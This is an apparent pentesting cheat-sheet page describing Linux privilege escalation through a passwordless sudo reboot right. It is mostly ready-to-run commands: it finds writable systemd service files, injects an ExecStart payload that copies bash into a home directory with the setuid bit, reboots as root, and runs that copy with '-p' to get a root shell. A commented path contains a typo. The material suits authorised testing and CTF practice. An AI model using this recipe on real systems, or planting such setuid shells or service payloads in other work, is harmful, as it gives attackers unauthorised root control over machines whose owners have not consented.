Sudo Reboot Privilege Escalation
Sudo reboot commands might be vulnerable to privilege escalation (PrivEsc).
sudo -l
(ALL) NOPASSWD: /usr/sbin/reboot
Copied!
If we can execute "reboot" command as root, we can escalate to privileges.
We need to look for the system service config file which are writable.
find / -writable -name "*.service" 2>/dev/null
/etc/systemd/system/example.service
Copied!
If we find a writable file, we can inject a payload into Service.ExecStart.
# /etc/systemd/systm/example.service
[Unit]
Description=Zeno monitoring
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'cp /bin/bash /home/<username>/bash; chmod +xs /home/<username>/bash'
[Install]
WantedBy=multi-user.target
Copied!
Now reboot as root.
sudo /usr/sbin/reboot
Copied!
After the system rebooted, the command in the ExecStart will be executed. Now we should get a root shell by executing the copied bash command.
/home/<username>/bash -p
Last updated